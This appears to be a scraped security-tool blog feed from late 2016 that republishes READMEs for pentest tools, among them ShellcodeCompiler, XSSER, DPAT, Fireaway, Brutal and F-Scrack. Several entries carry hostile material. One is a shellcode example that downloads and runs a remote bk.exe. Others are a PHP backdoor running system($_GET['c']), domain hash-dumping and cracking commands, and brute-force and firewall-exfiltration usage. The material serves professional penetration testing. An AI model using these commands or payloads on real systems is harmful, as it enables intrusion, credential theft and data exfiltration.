  • Remember, use the SMTP server address and XMPP server address for the address -a flag, when cracking SMTP and XMPP, respectively.
  • Facebook requires the username ID. This is a little bit of a setback since some people do not display their ID publicly on their profile.
  • Make sure the wordlist and its directory is specified. If it is in /usr/local/wordlists/wordlist.txt specify that for the wordlist -w flag.
  • Remember that some protocols are not based on their default port. A FTP server will not necessarily always be on port 21 . Please keep that in mind.
  • Use this for educational and ethical hacking purposes, as well as the sake of learning code and security-oriented practices. No script kiddies!


deep-pwning - Metasploit for Machine Learning

November 21, 2016, 6:16 am
$
0
0

Deep-pwning is a lightweight framework for experimenting with machine learning models with the goal of evaluating their robustness against a motivated adversary.
Note that deep-pwning in its current state is no where close to maturity or completion. It is meant to be experimented with, expanded upon, and extended by you. Only then can we help it truly become the goto penetration testing toolkit for statistical machine learning models.

Background
Researchers have found that it is surprisingly trivial to trick a machine learning model (classifier, clusterer, regressor etc.) into making an objectively wrong decisions. This field of research is called Adversarial Machine Learning . It is not hyperbole to claim that any motivated attacker can bypass any machine learning system, given enough information and time. However, this issue is often overlooked when architects and engineers design and build machine learning systems. The consequences are worrying when these systems are put into use in critical scenarios, such as in the medical, transportation, financial, or security-related fields.
Hence, when one is evaluating the efficacy of applications using machine learning, their malleability in an adversarial setting should be measured alongside the system's precision and recall.
This tool was released at DEF CON 24 in Las Vegas, August 2016, during a talk titled Machine Duping 101: Pwning Deep Learning Systems .

Structure
This framework is built on top of Tensorflow , and many of the included examples in this repository are modified Tensorflow examples obtained from the Tensorflow GitHub repository .
All of the included examples and code implement deep neural networks , but they can be used to generate adversarial images for similarly tasked classifiers that are not implemented with deep neural networks. This is because of the phenomenon of 'transferability' in machine learning, which was Papernot et al. expounded expertly upon in this paper . This means means that adversarial samples crafted with a DNN model A may be able to fool another distinctly structured DNN model B , as well as some other SVM model C .
This figure taken from the aforementioned paper (Papernot et al.) shows the percentage of successful adversarial misclassification for a source model (used to generate the adversarial sample) on a target model (upon which the adversarial sample is tested).


Components
Deep-pwning is modularized into several components to minimize code repetition. Because of the vastly different nature of potential classification tasks, the current iteration of the code is optimized for classifying images and phrases (using word vectors).
These are the code modules that make up the current iteration of Deep-pwning:
  1. Drivers
    The drivers are the main execution point of the code. This is where you can tie the different modules and components together, and where you can inject more customizations into the adversarial generation processes.
  2. Models
    This is where the actual machine learning model implementations are located. For example, the provided lenet5 model definition is located in the model() function witihn lenet5.py . It defines the network as the following: 
      -> Input
      -> Convolutional Layer 1
      -> Max Pooling Layer 1
      -> Convolutional Layer 2
      -> Max Pooling Layer 2
      -> Dropout Layer
      -> Softmax Layer
      -> Output

    LeCun et al. LeNet-5 Convolutional Neural Network
  3. Adversarial (advgen)
    This module contains the code that generates adversarial output for the models. The run() function defined in each of these advgen classes takes in an input_dict , that contains several predefined tensor operations for the machine learning model defined in Tensorflow. If the model that you are generating the adversarial sample for is known, the variables in the input dict should be based off that model definition. Else, if the model is unknown, (black box generation) a substitute model should be used/implemented, and that model definition should be used. Variables that need to be passed in are the input tensor placeholder variables and labels (often refered to as x -> input and y_ -> labels), the model output (often refered to as y_conv ), and the actual test data and labels that the adversarial images will be based off of.
  4. Config
    Application configurations.
  5. Utils
    Miscellaneous utilities that don't belong anywhere else. These include helper functions to read data, deal with Tensorflow queue inputs etc.
These are the resource directories relevant to the application:
  1. Checkpoints
    Tensorflow allows you to load a partially trained model to resume training, or load a fully trained model into the application for evaluation or performing other operations. All these saved 'checkpoints' are stored in this resource directory.
  2. Data
    This directory stores all the input data in whatever format that the driver application takes in.
  3. Output
    This is the output directory for all application output, including adversarial images that are generated.

Getting Started

Installation
Please follow the directions to install tensorflow found here https://www.tensorflow.org/versions/r0.8/get_started/os_setup.html which will allow you to pick the tensorflow binary to install. 
$ pip install -r requirements.txt

Execution Example (with the MNIST driver)
To restore from a previously trained checkpoint. (configuration in config/mnist.conf) 
$ cd dpwn
$ python mnist_driver.py --restore_checkpoint
To train from scratch. (note that any previous checkpoint(s) located in the folder specified in the configuration will be overwritten) 
$ cd dpwn
$ python mnist_driver.py

Task list
  • Implement saliency graph method of generating adversarial samples
  • Add defense module to the project for examples of some defenses proposed in literature
  • Upgrade to Tensorflow 0.9.0
  • Add support for using pretrained word2vec model in sentiment driver
  • Add SVM & Logistic Regression support in models (+ example that uses them)
  • Add non-image and non-phrase classifier example
  • Add multi-GPU training support for faster training speeds

Requirements
Note that dpwn requires Tensorflow 0.8.0. Tensorflow 0.9.0 introduces some

Contributing
(borrowed from the amazing Requests repository by kennethreitz)
  • Check for open issues or open a fresh issue to start a discussion around a feature idea or a bug.
  • Fork the repository on GitHub to start making your changes to the master branch (or branch off of it).
  • Write a test which shows that the bug was fixed or that the feature works as expected.
  • Send a pull request and bug the maintainer until it gets merged and published. :) Make sure to add yourself to AUTHORS.md .

Acknowledgements
There is so much impressive work from so many machine learning and security researchers that directly or indirectly contributed to this project, and inspired this framework. This is an inconclusive list of resources that was used or referenced in one way or another:

Papers

Code

Datasets


httpstat - Curl Statistics Made Simple

November 22, 2016, 5:45 am
$
0
0

httpstat visualizes curl(1) statistics in a way of beauty and clarity.
It is a single file Python script that has no dependency and is compatible with Python 3.

Installation
There are three ways to get httpstat :
  • Download the script directly: wget https://raw.githubusercontent.com/reorx/httpstat/master/httpstat.py
  • Through pip: pip install httpstat
  • Through homebrew (macOS only): brew install httpstat

Usage
Simply: 
python httpstat.py httpbin.org/get
If installed through pip or brew, you can use httpstat as a command: 
httpstat httpbin.org/get

cURL Options
Because httpstat is a wrapper of cURL, you can pass any cURL supported option after the url (except for -w , -D , -o , -s , -S which are already used by httpstat ): 
httpstat httpbin.org/post -X POST --data-urlencode "a=b" -v

Environment Variables
httpstat has a bunch of environment variables to control its behavior. Here are some usage demos, you can also run httpstat --help to see full explanation.
  • HTTPSTAT_SHOW_BODY
  • HTTPSTAT_SHOW_IP
  • HTTPSTAT_SHOW_SPEED
  • HTTPSTAT_SAVE_BODY
  • HTTPSTAT_CURL_BIN
  • HTTPSTAT_DEBUG

Set to true to see debugging logs. Default is false

For convenience, you can export these environments in your .zshrc or .bashrc , example: 
export HTTPSTAT_SHOW_IP=false
export HTTPSTAT_SHOW_SPEED=true
export HTTPSTAT_SAVE_BODY=false

Related Projects
Here are some implementations in various languages:
Some code blocks in httpstat are copied from other projects of mine, have a look:


Search

Brutal - Toolkit to quickly create various Payload, PowerShell Attack, Virus Attack and Launch Listener for a HID

November 23, 2016, 6:36 am
$
0
0

Brutal is extremely useful for executing scripts on a target machine without the need for human-to-keyboard interaction ( HID -ATTACK ) .When you insert the device, it will be detected as a keyboard, and using the microprocessor and onboard flash memory storage, you can send a very fast set of keystrokes to the target’s machine and completely compromise it, regardless of autorun. I’ve used it in my security testing to run recon or enumeration scripts, execute reverse shells, exploit local DLL hijack/privilege escalation vulnerabilities, and get all password . Now im develop new tools the name is Brutal

So what Brutal ?
Brutal is a toolkit to quickly create various payload,powershell attack , virus attack and launch listener for a Human Interface Device

Screenshoot



Video
  • Do you want like a mr robot hacking scene when Angela moss plug usb into computer for get credential information ? you can choose payload in brutal ( optional 3 or 4 )

The Goal
  • Generate various payload and powershell attack without coding
  • To help breaking computer very fast and agile :p
  • The Payloads Compatibility > target Windows machines only

Requirements
  • Arduino Software ( I used v1.6.7 )
  • TeensyDuino
  • Linux udev rules
  • How install all requirements ? Visit This Wiki

Supported Hardware
The following hardware has been tested and is known to work.
  • Teensy 3.x
  • Usb Cable 

Getting Started
  1. Copy and paste the PaensyLib folder inside your Arduino\libraries
  2. git clone https://github.com/Screetsec/Brutal.git
  3. cd Brutal
  4. chmod +x Brutal.sh
  5. sudo ./Brutal.sh or sudo su ./Brutal.sh

Credits

Metasploitable3 - An Intentionally Vulnerable Machine for Exploit Testing

November 24, 2016, 6:00 am
$
0
0


Metasploitable3 is a VM that is built from the ground up with a large amount of security vulnerabilities. It is intended to be used as a target for testing exploits with metasploit .
Metasploitable3 is released under a BSD-style license. See COPYING for more details.

Building Metasploitable 3
System Requirements:
  • OS capable of running all of the required applications listed below
  • VT-x/AMD-V Supported Processor recommended
  • 65 GB Available space on drive
  • 2.5 GB RAM
Requirements:
NOTE: A bug was recently discovered in VirtualBox 5.1.8 that is breaking provisioning. More information here .
NOTE: A bug was recently discovered in Vagrant 1.8.7 on OSX that is breaking provisioning. More information here .
To build automatically:
  1. Run the build_win2008.sh script if using bash, or build_win2008.ps1 if using Windows.
  2. If the command completes successfully, run 'vagrant up'.
  3. When this process completes, you should be able to open the VM within VirtualBox and login. The default credentials are U: vagrant and P: vagrant.
To build manually:
  1. Clone this repo and navigate to the main directory.
  2. Build the base VM image by running packer build windows_2008_r2.json . This will take a while the first time you run it since it has to download the OS installation ISO.
  3. After the base Vagrant box is created you need to add it to your Vagrant environment. This can be done with the command vagrant box add windows_2008_r2_virtualbox.box --name=metasploitable3 .
  4. Use vagrant plugin install vagrant-reload to install the reload vagrant provisioner if you haven't already.
  5. To start the VM, run the command vagrant up . This will start up the VM and run all of the installation and configuration scripts necessary to set everything up. This takes about 10 minutes.
  6. Once this process completes, you can open up the VM within VirtualBox and login. The default credentials are U: vagrant and P: vagrant.

Vulnerabilities

More Information
The wiki has a lot more detail and serves as the main source of documentation. Please check it out .

Acknowledgements
The Windows portion of this project was based off of GitHub user joefitzgerald's packer-windows project. The Packer templates, original Vagrantfile, and installation answer files were used as the base template and built upon for the needs of this project.


F-Scrack - A Single File Bruteforcer Supports Multi-Protocol

November 25, 2016, 5:48 am
$
0
0

F-Scrack is a single file bruteforcer supports multi-protocol, no extra library requires except python standard library, which is ideal for a quick test.

Currently support protocol: FTP, MySQL, MSSQL,MongoDB,Redis,Telnet,Elasticsearch,PostgreSQL.

Compatible with OSX, Linux, Windows, Python 2.6+.

Usage
Options: 
python F-Scrack.py -h 192.168.1 [-p 21,80,3306] [-m 50] [-t 10]

-h
Supports ip(192.168.1.1), ip range (192.168.1) (192.168.1.1-192.168.1.254), ip list (ip.ini) , maximum 65535 ips per scan.
-p
Ports you want to scan, use comma to separate multi ports. Eg 1433,3306,5432. 
Default scan ports(21,23,1433,3306,5432,6379,9200,11211,27017) if no ports specified.
-m
Number of threads. Default is 100.
-t
Seconds to wait before timeout.
-d
Dictionary file.
-n
Scan without ping scan(Live hosts detect).
Example: 
python F-Scrack.py -h 10.111.1
python F-Scrack.py -h 192.168.1.1 -d pass.txt
python F-Scrack.py -h 10.111.1.1-10.111.2.254 -p 3306,5432 -m 200 -t 6
python F-Scrack.py -h ip.ini -n


Faraday v2.2 - Collaborative Penetration Test and Vulnerability Management Platform

November 26, 2016, 6:22 am
$
0
0
Faraday is the Integrated Multiuser Risk Environment you were looking for! It maps and leverages all the knowledge you generate in real time, letting you track and understand your audits. Our dashboard for CISOs and managers uncovers the impact and risk being assessed by the audit in real-time without the need for a single email. Developed with a specialized set of functionalities that help users improve their own work, the main purpose is to re-use the available tools in the community taking advantage of them in a collaborative way!

This release features a brand new library to connect with Faraday Server!

Managing vulnerabilities is now easier in Faraday!

Status and creator fields

A simple change can go a long way - we added two new ways of classifying issues stored in Faraday.

With the new update it is now possible to check the status of an issue - this could be opened, closed, re-opened or the risk is accepted.

If you set a vulnerability status as closed and later on when you re-scan the target the same issue is found again, the status will automatically change into re-opened allowing you to have a more granular view of the results of your scans. This is perfect for doing remediation retests, helping you to quickly understand what is still vulnerable.

Also, issues created by a specific tool, can now be filtered and sorted out. A great way to see where are the sources of information used during an engagement.

For example, as we can see in the following screenshots, we have three different issues that are closed [1]. After we import a Nessus scan the issues are marked as re-opened [2], indicating that the vulnerability is still present in the last scan.

1. Closed issues

2. Re-opened by Nessus scan import

Corporate Changes:

  • Added a message to configure the Webshell - added a descriptive message for users who don’t have the Webshell properly configured

Webshell configuration message

Changes:

  • New library to connect with Faraday Server 
  • Fixed Fplugin, now it uses the new library to communicate with the Server 
  • New fields for Vulnerabilities: plugin creator and status
  • Refactor in Faraday Core and GTK Client 
  • Bug fixing in Faraday Client and Server 
  • News boxes example in the WEB UI
  • New plugins: Dirb, Netdiscover, FruityWifi, Sentinel 
  • Improvements on the WPscan plugin 
  • Fixed Licenses search - there was a bug that disabled the option to search for licenses, now it is fixed and full-text search is enabled in the Licenses component



Licenses search
  • Refactor Licenses module to be compatible with JS Strict Mode - in our efforts to improve our existing codebase for the WEB UI we refactored this component in order to make it run using Strict Mode in JavaScript

https://www.faradaysec.com
https://github.com/infobyte/faraday
https://twitter.com/faradaysec
https://forum.faradaysec.com/

Vproxy - Forward HTTP/S Traffic To Proxy Instance

November 27, 2016, 6:10 am
$
0
0

If you are familiar with mobile penetration testing and you did one before, you probably came across this kind of situation when you want to intercept the application HTTP or HTTPS traffic using your favorite proxy tool such as Burp Suite, Fiddler, Charles , etc.

After modifying the WIFI connection and adding your proxy host and port there, you should immediately be able to capture the HTTP/S traffic.

However, this kind of method is not always working since some mobile applications are using customized HTTP/S functionalities within the device.

So what you should do in order to capture all of the HTTP/S traffic from the mobile device without breaking you heads? it’s simple, use Vproxy!

Vproxy
Vproxy is a python script that built to quickly configure a PPTP VPN server that will redirect HTTP/S traffic to your favorite proxy instance host. 

Screenshot


System Requirements
This script was built and test on Kali-Linux and should work on any linux distribution

Prerequisites 
pip install termcolor

Usage
Setup VPN server on localip and redirect traffic sent from the clients (80,443) to proxy 192.168.1.10:8080 
$sudo python vproxy.py -localip 192.168.1.9 -phost 192.168.1.10 -pport 8080 -port 80,443

The Goal
  1. Help Penetration Testers conduct mobile security assessment easier
  2. Intercept Mobile HTTP/S traffic from any mobile device

Configuring VPN Videos
IOS - https://www.youtube.com/watch?v=TC-xJ9rCTXU
Android - https://www.youtube.com/watch?v=bFeJZKX4O3A


NEET - Network Enumeration and Exploitation Tool

November 28, 2016, 6:21 am
$
0
0

Neet is a flexible, multi-threaded tool for network penetration testing. It runs on Linux and co-ordinates the use of numerous other open-source network tools, with the aim of gathering as much network information as possible in clear, easy-to-use formats. The core scanning engine finds and identifies network services, the modules test or enumerate those services, and the Neet Shell provides an integrated environment for processing the results and exploiting known vulnerabilities. As such, it sits somewhere between manually running your own port scans and subsequent tests, and running a fully automated vulnerability assessment (VA) tool. It has many options which allow the user to tune the test parameters for network scanning in the most efficient and practical way.

Install
git clone https://github.com/JonnyHightower/neet.git
cd neet
sudo bash install.sh

Neet is aimed at professional penetration testers, internal IT security teams and network administrators who wish to know more about what's actually on their network infrastructure. You might want to try it out if you fall into one of those categories.

It has been written (and continues to be developed) by a professional penetration tester over years of engagements, and has been designed explicitly to do the leg-work for you and to make it convenient and safe to get your hands on useful network information before the customer brings your first cup of tea of the day.

Neet has a simple and flexible command-line interface, and gathers a lot of data about the networks within its scope. It will give you an up-to-the second view of how many services it's found on the network, what types of services they are, what types of hosts, what their hostnames are, whether they belong to domains, etc. If the modules are enabled (as they are by default) then it will perform tests against certain services - looking for default SNMP community strings and enumerating whatever is possible from SMB services, for example. It will also check for glaring security vulnerabilities and allow you to exploit them if you so choose.

All the information gathered is stored in human-readable text files so they can be grepped and awked as the user sees fit and, as well as storing the raw data, Neet aggregates a lot of it into files of related information for easier processing.

There's also a customised shell which takes a lot of the common tasks you'd normally perform and rolls them into simple commands. For example, the win command lists the Windows hosts on the network, and cross-references them against issues and vulnerabilities found to give you a colour-coded list of live Windows hosts, and the testshares command checks for unauthenticated access to SMB shares.

There is also documentation. Check out the man pages, the help command inside the neet shell, and the HTML documentation in /opt/neet/doc. Also, please check out the project page for the latest news and issue tracking/feature requests.

In summary, Neet is not a point-and-click hacking or vulnerability assessment tool. It is a console-based environment best run under X Windows, designed for the operator to gain insight into the components, relationships and operation of the network under test. It is also designed to help reporting by gathering as much evidence as possible.

Some of the main features include:
  • Single interface to co-ordinate many tools;
  • Port scans and service identification are done in batches, so useful results appear early on;
  • Easy to specify ranges to include and exclude, both for IP addresses and ports;
  • Doesn't create more traffic than is strictly necessary;
  • Detailed, timestamped logging;
  • All raw tool output available, as well as sensibly-arranged output in text format;
  • Customisable speed and intensity;
  • Reliable scanning from multiple interfaces and over VPNs;
  • Scan control allows you to pause / resume the scan;
  • Cancel scans on individual hosts;
  • Monitor progress of the scanning;
  • Very configurable;
  • Neet shell (neetsh) is bash shell with many aliases for getting through results quickly;
  • Exploitation for specific exploits included in the Neet shell;
  • Dump credentials from remote hosts directly into your Neet results without manually shunting files and commands between machines;
  • Online incremental updates without having to do a full reinstall each time;
  • Documentation: man pages, HTML help and the help command in the Neet shell;
  • Many more.


Fireaway - Next Generation Firewall Audit and Bypass Tool

November 29, 2016, 6:00 am
$
0
0

Fireaway is a tool for auditing, bypassing, and exfiltrating data against layer 7/AppID inspection rules on next generation firewalls. These tactics are based on the principle of having to allow connections to establish through the NGFW in order to see layer 7 data to filter, as well as spoofing applications to hide communication channels inside the firewall logs as normal user traffic, such as Internet surfing.

Starting the FireAway Server: Typically the FireAway server would be started on the egress side of the firewall (such as a server on the Internet), and listen on a port believed to be closed to see if any application based rules allow traffic out on this port: 
python fa_server.py <port to listen on>
All data received by the server on this port will be saved to the file ReceivedData.txt in the directory the server was launched from. If the server detects differing sizes in the amount of data received (indicating firewall filtering has kicked in), this output will be shown on the server console: 
Got the same or lower amount of data on two consecutive runs.  If sending test data, maximum data leak size may have been reached.
Starting the FireAway Client/Application Spoofer: The FireAway client has two modes:
  • Test mode (mode 0)-Send random data in incrementing chunk sizes to see how much data can be sent before the firewall AppID engages and stops traffic flow.
  • Exfiltration mode (mode 1)-Open a file and send it in chunks through the firewall.
To start the basic client: 
python fa_client.py <FireAway server IP> <Fireaway Server Port> <Client mode (0 or 1)>
To start the application spoofing client: 
python fa_spoof.py <FireAway Server IP> <Fireaway Server Port> <Client mode (0 or 1)>
Application spoofing will randomly insert HTTP headers with the data chunks to pollute the logs with various applications in order to mask the data exfiltration.


Search

XSSER - From XSS to RCE

November 30, 2016, 6:00 am
$
0
0

From XSS to RCE 2.5 - Black Hat Europe Arsenal 2016

Demo

Requirements
  • Python (2.7.*, version 2.7.11 was used for development and demo)
  • Gnome
  • Bash
  • Msfconsole (accessible via environment variables)
  • Netcat (nc)
  • cURL (curl) [NEW]
  • PyGame (apt-get install python-pygame) [NEW]

Payload Compatibility
  • Chrome (14 Nov 2015) - This should still work.
  • Firefox (04 Nov 2016) - Tested live at Black Hat Arsenal 2016

WordPress Lab

WordPress Exploit

Joomla Lab

Joomla Exploit

Directories
  • Audio: Contains remixed audio notifications.
  • Exploits: Contains DirtyCow (DCOW) privilege escalation exploits.
  • Joomla_Backdoor: Contains a sample Joomla extension backdoor which can be uploaded as an administrator and subsequently used to execute arbitrary commands on the system with system($_GET['c']).
  • Payloads/javascript: Contains the JavaScript payloads. Contains a new "add new admin" payload for Joomla.
  • Shells: Contains the PHP shells to inject, including a slightly modified version of pentestmonkey's shell that connects back via wget.

Developed By
  • Hans-Michael Varbaek
  • Sense of Security

Credits
  • MaXe / InterN0T

Dripcap - Caffeinated Packet Analyzer

December 1, 2016, 6:00 am

idb - iOS App Security Assessment Tool

December 2, 2016, 6:16 am
$
0
0
idb is a tool to simplify some common tasks for iOS app security assessments and research. Please see the Documentation for a more detailed summary of each function.

Features
  • Assessment Setup
    • SSH port forwarding
    • Installation of helper utilities
  • App Information
    • Bundle information
    • Registered URL Schemes
    • Platform and SDK Versions
    • Data folder location
    • Entitlements
  • Data Storage
    • List plist files and data protection class
    • List sqlite files and data protection class
    • List Cache.db files and data protection class
    • Full app file system browser
      • Browse files
      • Download/view files
      • Check data protection
      • Rsync folders and keep git revisions
    • Dump iOS keychain
  • Binary Analysis
    • Check for encryption
    • Check for protections (ASLR/PIE, DEP, ARC)
    • List shared libraries
    • Extract strings in app binary
    • Dump class and method signatures
  • IPC
    • List URL handlers
    • Invoke and fuzz URL handlers
    • Monitor the iOS pasteboardA
  • Other Tools
    • Check for iOS backgrounding screenshot
    • Install certificates
    • Edit /etc/hosts file

ShellcodeCompiler - Shellcode C/C++ Compiler for Windows

December 3, 2016, 6:06 am
$
0
0

Shellcode Compiler is a program that compiles C/C++ style code into a small, position-independent and NULL-free shellcode for Windows. It is possible to call any Windows API function in a user-friendly way.

Shellcode Compiler takes as input a source file and it uses it's own compiler to interpret the code and generate an assembly file which is assembled with NASM ( http://www.nasm.us/ ).
Shellcode compiler was released at DefCamp security conference in Romania, November 2016.

Command line options 
    -h (--help)      : Show this help message
    -v (--verbose)   : Print detailed output
    -t (--test)      : Test (execute) generated shellcode
    -r (--read)      : Read source code file
    -o (--output)    : Output file of the generated binary shellcode
    -a (--assembbly) : Output file of the generated assembly code

Source code example 
    function URLDownloadToFileA("urlmon.dll");
    function WinExec("kernel32.dll");
    function ExitProcess("kernel32.dll");

    URLDownloadToFileA(0,"https://site.com/bk.exe","bk.exe",0,0);
    WinExec("bk.exe",0);
    ExitProcess(0);

Invocation example 
    ShellcodeCompiler.exe -r Source.txt -o Shellcode.bin -a Assembly.asm

Limitations
  1. It is not possible to use the return value of an API call
  2. It is not possible to use pointers or buffers
  3. It is not possible to declare variables
All these limitations will be fixed as soon as possible. However, many other limitations will exist. This is an Alpha version. Please report any bugs or suggestions.


DPAT - Domain Password Audit Tool for Pentesters

December 4, 2016, 6:09 am
$
0
0
This is a python script that will generate password use statistics from password hashes dumped from a domain controller and a password crack file such as oclHashcat.pot generated from the oclHashcat tool during password cracking. The report is an HTML report with clickable links.


You can run the python script at follows. 
dpat.py -n customer.ntds -c oclHashcat.pot -g "Domain Admins.txt" "Enterprise Admins.txt"
Note that the group lists at the end (-g "Domain Admins.txt "Enterprise Admins.txt") are optional.

Try this out on the example files provied in the sample_data folder of this project. The sample data was built from census data for common first and last names and passwords from the well known rockyou list.
Your customer.ntds file should be in this format:
domain\username:RID:lmhash:nthash:::
You can get this file by first dumping the password hashes from your domain controller by executing the following command in an administrative command prompt on a domain controller. Just make sure you have enough disk space to store the output in c:\temp. The amount of space needed will be slightly larger than the size of the ntds.dit file that is currently on the disk, as this performs a backup of that file and some registry settings. 
ntdsutil "ac in ntds" "ifm" "cr fu c:\temp" q q
You can then turn this output into the needed format using secretsdump.py 
secretsdump.py -system registry/SYSTEM -ntds Active\ Directory/ntds.dit LOCAL -outputfile customer
The command above will create a file called "customer.ntds" which you will use with this tool as well as for password cracking.
Your oclHashcat file should be in this format:
nthash:password
Or for LM Hashes:
lmhashLeftOrRight:leftOrRightHalfPasswordUpcased
The optional "-g" option is followed by a list of any number of files containing lists of users who are in the given group such as "Enterprise Admins" or "Domain Admins". The file can be in the format output by the PowerView PowerShell script as shown in the example below: 
Get-NetGroupMember -GroupName "Domain Admins" > "Domain Admins.txt"
or to read a group from another domain use something like the following (note that name of the other domain and the domain controller can be obtained with Get-NetForestDomain) 
Get-NetGroupMember -GroupName "Enterprise Admins" -Domain "some.domain.com" -DomainController "DC01.some.domain.com" > "Enterprise Admins.txt"
Alternatively, the group files can simply be a list of users, one per line, in the following format:
domain\username
The Domain Password Audit Tool also has the handy feature to finish cracking the LM hashes for any hashes where the NT hash was not cracked. This asssumes that you have used oclHashcat to brute force all 7 character passwords with the following command: 
./oclHashcat64.bin -m 3000 -a 3 customer.ntds -1 ?a ?1?1?1?1?1?1?1 --increment
To see all available DPAT options use the '-h' or '--help' option 
usage: dpat.py [-h] -n NTDSFILE -c CRACKFILE [-o OUTPUTFILE]
               [-d REPORTDIRECTORY] [-w] [-s]
               [-g [GROUPLISTS [GROUPLISTS ...]]]

This script will perfrom a domain password audit based on an extracted NTDS
file and password cracking output such as oclHashcat.

optional arguments:
  -h, --help            show this help message and exit
  -n NTDSFILE, --ntdsfile NTDSFILE
                        NTDS file name (output from SecretsDump.py)
  -c CRACKFILE, --crackfile CRACKFILE
                        Password Cracking output in the default form output by
                        oclHashcat, such as oclHashcat.pot
  -o OUTPUTFILE, --outputfile OUTPUTFILE
                        The name of the HTML report output file, defaults to
                        _DomainPasswordAuditReport.html
  -d REPORTDIRECTORY, --reportdirectory REPORTDIRECTORY
                        Folder containing the output HTML files, defaults to
                        DPAT Report
  -w, --writedb         Write the SQLite database info to disk for offline
                        inspection instead of just in memory. Filename will be
                        "pass_audit.db"
  -s, --sanitize        Sanitize the report by partially redacting passwords
                        and hashes. Prepends the report directory with
                        "Sanitized - "
  -g [GROUPLISTS [GROUPLISTS ...]], --grouplists [GROUPLISTS [GROUPLISTS ...]]
                        The name of one or multiple files that contain lists
                        of usernames in particular groups. The group names
                        will be taken from the file name itself. The username
                        list must be in the same format as found in the NTDS
                        file such as some.ad.domain.com\username. Example: -g
                        "Domain Admins.txt" "Enterprise Admins.txt"


Viewing all 5816 articles
Browse latest View live
Search
<script src="https://jsc.adskeeper.com/r/s/rssing.com.1596347.js" async> </script>